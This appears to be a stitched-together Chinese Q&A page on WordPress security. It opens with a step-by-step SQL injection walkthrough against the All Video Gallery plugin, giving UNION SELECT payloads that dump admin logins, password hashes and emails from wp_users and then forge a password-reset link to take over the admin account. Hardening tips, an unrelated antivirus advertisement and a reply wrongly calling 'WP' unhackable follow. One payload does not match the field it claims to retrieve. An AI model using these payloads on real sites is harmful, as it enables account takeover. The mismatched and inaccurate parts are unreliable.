本文目录一览:
- 1、如何利用SQL注入漏洞攻破一个WordPress网站
- 2、如何进入网站后台
- 3、wp可以入侵吗,。。。?
- 4、如何采用wp-login.php重命名方式防止wordpress网站攻击
- 5、使用WordPress系统网站被暴力破解了,应该怎么解决以及预防
- 6、无聊的问题,勒索病毒会入侵WP吗
如何利用SQL注入漏洞攻破一个WordPress网站
SQL注入的基本原理
sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是,我们推理,这样页面的后台处理的sql应该是这样的:
select * form custom_order where custom_id = {$_GET['customID']}
按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。但是,如果这个参数被人恶意改成了如下形式:
union select 1,2,3,user,5,passwd,7,8,9,10 from admin
按这样的参数拼装成的sql就成了这样:
select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。
All Video Gallery插件的漏洞简介
安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:
;pid=11
访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。
WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。
获取超级管理员用户名
为了获取用户表中的用户名,我们注入的sql是这样的:
;pid=1pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
获取超级管理员邮件地址
我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。
要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:
;pid=1pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
重置管理员密码
WordPress的后台登陆地址是,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。
这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样
的方法获取这个激活码,自己拼装出密码重置地址。存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:
;pid=1pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
有了激活码,我们就可以拼装出装置密码的地址了:
;key=resetkeylogin=username
利用这个地址进入重置密码页面:
总结
我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,
所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。
如何进入网站后台
可以按照如下方式进行操作:
进入网站的后台第一步你要找到网站的后台地址。找到网站后台地址后,一般都要输入用户名和密码。当用户名和密码正确之后就能进入网站后台。你可以问问之前管理这个网站的人,也可以问做网站的人设定的用户名和密码。具体如下:
1、首先要进入到自己的网站后台.你必须知道自己的网站登录名称和密码,如下图中所表示。
2、第二点是自己建的网站,自己应该知道自己网站的域名,也就是网址。类似下图这样的网址。下面就教大家进入后台的步骤,如下图中所表示。
3、点开自己的网址,再网址的后面加上 /wp-admin/ 我的网址是用的WORDPRESS建的站.所以前面的WP可能就是WORDPRESS的缩写.后面的admin都是通用的。后台都是admin.在相应的位置输入账户名称和密码,如下图中所表示。
4、跳转到这个页面就到了后台了。需要怎么设置和更新可以自己在这个页面对网站进行调整,如下图中所表示。
wp可以入侵吗,。。。?
爱应用-Wper:【yinshuang07】 为您解答:
当然可以,但是目前还没有被入侵过,所以说他的系统最安全呀,毕竟是定位为商务的
满意请采纳,有疑问请追问,谢谢!
如何采用wp-login.php重命名方式防止wordpress网站攻击
操作步骤:
1、复制一份根目录wp-login.php文件命名为wp-login1.php(也可以重命名为你自己喜欢的其他文件字),然后将wp-login.php文件改名或者删除,建议删除。然后打开wp-login1.php文件将源码中的wp-login.php全部替换为wp-login1.php。
2、然后打开wp-includes/目录下的general-template.php文件把其中的wp-login.php替换为wp-login1.php。
使用WordPress系统网站被暴力破解了,应该怎么解决以及预防
WordPress优化一直以来是各位wordpress站长所关心的问题,wordpress本身已经有强大的安全防护措施,但是无聊人士之多,今天就跟大家谈谈如何保护你的wordpress网站。什么是暴力破解?不是每一个WordPress站长或者Web开发人员都不错。总有一些邪恶的人。 暴力破解是当一个人或一些机器上尝试通过反复发送的登录尝试破解您的用户名密码组合。 他们会使用一些常见的和随机的用户名和密码组合进行连续登录尝试到你的WordPress。如何保护你的wordpress防止被暴力破解?当然这是我们今天讨论的主题,暴力破解是邪恶的,但是你可以很容易地通过采取下面这些简单的预防措施保护您的WordPress的强力攻击:强大的用户名:您还是使用的是admin为你的WordPress的用户名? 这是默认的用户名也很容易被黑客猜出此用户名。 请务必使用您的姓名或不同的东西作为你的WordPress的管理员用户名。强密码:就像强大的用户名,你需要一个强大的密码! 暴力破解者试图猜测一些随机密码组合,字典中的单词,并使用所有常用的密码破解您的密码。 使用password作为您的密码是不是一个明智的举动,因为暴力破解将马上破解这个密码。 强大的wordpress密码应该使用随机字母,数字和特殊字符。 不要使用类似123456或QWERTY字符串。您也可以通过访问howsecureismypassword.net 来检查您的密码强度。限制登录尝试:您也应该在你的WordPress网站限制登录尝试。 限制登录尝试的插件(Limit Login Attempts)会阻止管理员指定的限制登陆次数后的操作。 它不会让暴力破解尝试破解你的密码。通过IP限制进入wp-admin和wp-login:如果你是一个人在管理你的WordPress,那么只需要你自己能进入wordpress后台即可,你可以设定一个固定的IP地址段,通过.htaccess文件来限制进入wp-login和wp-admin。 你可以这样写:Order deny,allowDeny from allAllow from xx.xx.xx.0/24#Another IPAllow from xx.xx.xx.xx替换xx.xx.xx.xx 成你的IP地址. 要知道你的IP地址,你可以在百度中输入IP即可查询,也可以访问ip138。WordPress插件:其实这方面的插件很多,今天主要是介绍这款插件Wordfence Security,后台搜索即可安装,此款插件可以保护你的wordpress的安全,防止被暴力破解等攻击。所有这些步骤一定会保护你的WordPress网站从所有这些无用和邪恶的暴力破解攻击,你认为这些方法怎么样?转账请注明:/save-wordpress-brute-force-attacks/ 谢谢合作
无聊的问题,勒索病毒会入侵WP吗
建议楼主下载安装腾讯电脑管家来进行杀毒,
重启电脑按F8进入安全模式--打开腾讯电脑管家--杀毒--全盘扫描----顽固木马克星--深化扫描--完成重启电脑就可以了
腾讯电脑管家为国内首个采用“ 4+1 ”核“芯”杀毒引擎的专业杀毒软件,
应用腾讯自研第二代反病毒引擎“鹰眼”,
资源占用少,基于CPU虚拟执行技术能够根除顽固病毒,
大幅度提升深度查杀能力。